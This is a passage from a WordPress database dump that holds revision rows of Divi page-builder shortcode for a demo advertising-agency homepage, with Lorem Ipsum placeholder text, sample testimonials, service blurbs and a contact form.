animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 19:55:10','2020-08-07 19:55:10','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(573,1,'2020-08-07 19:57:44','2020-08-07 19:57:44','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" 